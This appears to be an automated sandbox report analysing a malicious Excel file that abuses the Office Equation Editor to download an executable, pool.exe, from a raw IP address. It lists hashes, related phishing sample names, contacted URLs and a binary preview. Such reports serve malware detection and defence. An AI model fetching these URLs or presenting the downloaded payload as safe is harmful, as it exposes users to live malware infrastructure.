                                                                                                                                                  		71822.bodis.comUnited States
                                                                                                                                                  		395082BODIS-NJUSfalse
                                                                                                                                                  3.121.113.175
                                                                                                                                                  		unknownUnited States
                                                                                                                                                  		16509AMAZON-02UStrue
                                                                                                                                                  151.101.0.119
                                                                                                                                                  		intoxickiss.comUnited States
                                                                                                                                                  		54113FASTLYUStrue

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                  Analysis ID:452641
                                                                                                                                                  Start date:22.07.2021
                                                                                                                                                  Start time:17:13:46
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 11m 47s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:light
                                                                                                                                                  Sample file name:Form BA.xlsx
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                  Number of analysed new started processes analysed:10
                                                                                                                                                  Number of new started drivers analysed:1
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.expl.evad.winXLSX@10/19@4/3
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:
                                                                                                                                                  • Successful, ratio: 15.5% (good quality ratio 15%)
                                                                                                                                                  • Quality average: 75.9%
                                                                                                                                                  • Quality standard deviation: 26%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsx
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, conhost.exe, svchost.exe
                                                                                                                                                  • TCP Packets have been reduced to 100
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  17:15:03API Interceptor40x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                  17:15:04API Interceptor287x Sleep call for process: vbc.exe modified
                                                                                                                                                  17:15:54API Interceptor214x Sleep call for process: rundll32.exe modified

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  199.59.242.153new order.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • www.globaltradeview.com/n84e/?YP=YB5mtasMUEHgcdBg3w1JzInb0sE5RwTjc/Tqop+T4aXdM6WeS8rV/Q3f3EZlzbjbZYjOJg==&m8ot=8pa4DPp09N0DbNR0
                                                                                                                                                  PO_2005042020.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.funif.icu/dt9v/?WJBxWP=/dNyVkAccEq0OhJt4Ytz8g7S8Q6mx9qNCmyMDejIdoAPysAyB6+9naP82D/jnnZeL5y1&tFQp=7nutZ
                                                                                                                                                  Swift.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.chicagolandjunkcarbuyer.com/thl4/?oTO=9XRvGPdd9OZjw66gJDqZc4Tbb4K4WVD9/14pVD3HzfT4/RgnF8iuNk1sdPo8LsHsBiNm&YTLLWz=6lgHDJPh
                                                                                                                                                  SWIFT MT103.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gor.xyz/gscc/?g2JpWVKx=45WLw/qHVVUFgrjwGZOJHGiR4I/cQSQnF8oHOeXkYfHHiqRoy/0ZD/TpSUhrjbztz6x+QlAMnQ==&i48dF=AHEdxvQpNPBdxT6p
                                                                                                                                                  RFQ-Order contract requirements.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gor.xyz/gscc/?PB6pE=45WLw/qHVVUFgrjwGZOJHGiR4I/cQSQnF8oHOeXkYfHHiqRoy/0ZD/TpSUhS8qTu9st5QlAL0g==&l4=8potZVWpGZZ
                                                                                                                                                  hGpEbxogJ3.msiGet hashmaliciousBrowse
                                                                                                                                                  • www.chicagolandjunkcarbuyer.com/thl4/?VJBxa=6l9pDXLHZLZt8&sZyTH=9XRvGPdd9OZjw66gJDqZc4Tbb4K4WVD9/14pVD3HzfT4/RgnF8iuNk1sdMIsENXUfHkh
                                                                                                                                                  Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hitbars.space/q3t0/?_6F=+3dTbzfZs6MxWUk0s5DG9DSasbGeOcbq1TMJ6iU03rkZ0Vw53zLFflffW1vOU7AfPTuy&6l=CXf4ZT4
                                                                                                                                                  Statement for MCF and SSL890935672002937383920028202.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hullyc.com/3b4e/?qPtlS=BR-TqN&7nh=4ePaE0hXFCcoXxwZO8an49njM/FSx2KIc8Ta6ac5S7lyJ0MkFWvwf74A2m12MQKM4anz
                                                                                                                                                  INVOICE E-4137 REV.1 AND E-4136 REV.1.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.cleaner-solar.com/u9pi/?4hNHZPS8=4OyfnYx74NgWtXxZ7Rjofv7BR5c/IYUL06mPXh1Fccw5xmvA4OPZgb7qUWOtnmXbMvoo&op7=ob08qfOhk
                                                                                                                                                  Img-347654566091235.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.hitbars.space/q3t0/?q6A=+3dTbzfZs6MxWUk0s5DG9DSasbGeOcbq1TMJ6iU03rkZ0Vw53zLFflffW2P0EqgnV0P1&5j=6lULKpmp0J0
                                                                                                                                                  LEMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.booster.guru/aipc/?f6A8Sz=BMi4rIX3OaRmAVdWmHwDy158GXvJowW6rsMkLX8T/SeurUfZZjefoMGqIKxJ2f9Kzzfm&sDKp4l=3fHXUDz8CN-
                                                                                                                                                  vbc.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.gettollingagain.com/lth/?QPi=R0ZjXo5eb12AQfL2mJSQ4Pke5FoJc2BIBKrjfE0luvFwR4nyycvvY6a4I3dzSm6JElVt&EN=z2JTn6-hWBQxkJMP
                                                                                                                                                  0m445A5H66.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.wwwmacsports.com/nff/?E6Ap=0DK8_4-Xijpdzt&fZzpL=m9tMrdH5s5McIQQpiSGs8SInYxUL4H2IAxrYgc1ZIVpX4WbHn5hGWqowwb7fTo8LB/Xn
                                                                                                                                                  sample17.exeGet hashmaliciousBrowse
                                                                                                                                                  • ww1.blm35.net/
                                                                                                                                                  444890321.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.oklahomasundayschool.com/ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp
                                                                                                                                                  2435.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.northsytyle.com/dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W
                                                                                                                                                  ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.greenshirecommons.com/un8c/?8p=mBlnh5cldNPXtcmrZbSjCDRuhUw9cugXgXVTMTkNCQGRZTLNWcZvUlnJwuwR4xQFHfof&h6Z=FZOTUTGPt4-
                                                                                                                                                  fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.frontpagesweb.net/w88t/?1bWl=DwAbJomwIIUam/8Lxif0xJyCLP0/MlDCQn/X6EWMKnqqCjXzJeuBHxh9ROI30kSy7fCE&z6z=STRxNL2x
                                                                                                                                                  malware300.docmGet hashmaliciousBrowse
                                                                                                                                                  • ww25.gokeenakte.top/admin.php?f=1&subid1=20210605-2000-3553-b2c5-4eab817b0105
                                                                                                                                                  Payment.exeGet hashmaliciousBrowse
                                                                                                                                                  • www.digitalgamerentals.com/ngvm/?3fl00=eXBfF5JabAMvoJeV+Y5ra8EK8SdWvzGjXwXzLVFQuPc9hZ/16jkYHGAZEYy2Tm7CaklT&9rdLfJ=i48HtpdXmp

                                                                                                                                                  Domains

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  71822.bodis.comSWIFT MT103.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  RFQ-Order contract requirements.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  LEMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  henry.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  porosi e re Fature Proforma.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  RFQ-14042021 Guangzhou Haotian Equipment Technology Co., Ltd,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Revised Signed Proforma Invoice 000856453553.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  payment proof.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  SWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  winlog.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Order List - 022321-xlxs.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  FHT210995.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  099898892.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  SOA121520.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  udtiZ6qM4s.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  camscanner-011022020.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Se adjunta un nuevo pedido.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  payment copy pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  BODIS-NJUSnew order.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  PO_2005042020.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Swift.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  SWIFT MT103.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  RFQ-Order contract requirements.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  hGpEbxogJ3.msiGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Fra8994.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Statement for MCF and SSL890935672002937383920028202.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  INVOICE E-4137 REV.1 AND E-4136 REV.1.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Img-347654566091235.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  LEMO.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  vbc.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  0m445A5H66.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  sample17.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  444890321.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  2435.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  ] New Order Vung Ang TPP Viet Nam.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  fD56g4DRzG.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  malware300.docmGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153
                                                                                                                                                  Payment.exeGet hashmaliciousBrowse
                                                                                                                                                  • 199.59.242.153

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\pool[1].exe
                                                                                                                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):713216
                                                                                                                                                  Entropy (8bit):7.571021299706813
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:BUEnk8yfaR+DaY3bsojKdqFyirJ5Y1oDpgAwUzl3XoJPcISRqzGWl06bsyaUVKnp:KEnkZCR+ZjKYjrw1o1H73XwPcIll/bz6
                                                                                                                                                  MD5:734A568749C7879E5CA5EA2B8E082F5E
                                                                                                                                                  SHA1:27D6276E49602F3633DFDD94DE400DB53E209B51
                                                                                                                                                  SHA-256:D0F6F28C586B78DFBC7D4E6C277C20761C9DB38E0CD059807BE5252B52D10660
                                                                                                                                                  SHA-512:012E2122B51055DD011341E629890F3D7B9D3D8CE6984D62EDD287C625634C01B5FB7D220002C79D5E53EBF089FEE5C505B48FDCBE89951BEB36D0A92E9B96E0
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Reputation:low
                                                                                                                                                  IE Cache URL:http://3.121.113.175/www/pool.exe
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. .......................@............@.................................|...O............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B........................H...........p...........L...0)...........................................0............( ...(!.........(.....o"....*.....................(#......($......(%......(&......('....*N..(....oE...((....*&..()....*.s*........s+........s,........s-........s.........*....0...........~....o/....+..*.0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0..<........~.....(4.....,!r...p.....(5...o6...s7............~.....+..*.0......
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\538D84B1.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CD4C46B.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):94963
                                                                                                                                                  Entropy (8bit):7.9700481154985985
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                                                                                                                                                  MD5:17EC925977BED2836071429D7B476809
                                                                                                                                                  SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                                                                                                                                                  SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                                                                                                                                                  SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\965742FE.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BFF9592.png
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):11303
                                                                                                                                                  Entropy (8bit):7.909402464702408
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                                                                                                                                                  MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                                                                                                                                                  SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                                                                                                                                                  SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                                                                                                                                                  SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3F7F095.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):62140
                                                                                                                                                  Entropy (8bit):7.529847875703774
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                                                                                                                                                  MD5:722C1BE1697CFCEAE7BDEFB463265578
                                                                                                                                                  SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                                                                                                                                                  SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                                                                                                                                                  SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AB839B70.jpeg
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):85020
                                                                                                                                                  Entropy (8bit):7.2472785111025875
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                                                                                                                                  MD5:738BDB90A9D8929A5FB2D06775F3336F
                                                                                                                                                  SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                                                                                                                                  SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                                                                                                                                  SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B52CFCE6.emf
                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):648132
                                                                                                                                                  Entropy (8bit):2.812369690502041
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:u34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:g4UcLe0JOcXuunhqcS
                                                                                                                                                  MD5:2051FB74D1E67A37780B94F236AFB26D
                                                                                                                                                  SHA1:8BA9450C0530390D27E7FDCEC790D3897730DFA4
                                                                                                                                                  SHA-256:643983836D160B51928239762C729C2B9D374A85B803387CE24B3C02F3C55B04
                                                                                                                                                  SHA-512:C1C3FF7400EAD8F1B0CD7ED7C2378974ABE971F7FA8943EA583ED9FF9E4341EE9C102E6FA9C1D9C784C26DC716944638B83781BE3E60E0A5EF8698B1FD9BA3DA
                                                                                                                                                  Malicious:false
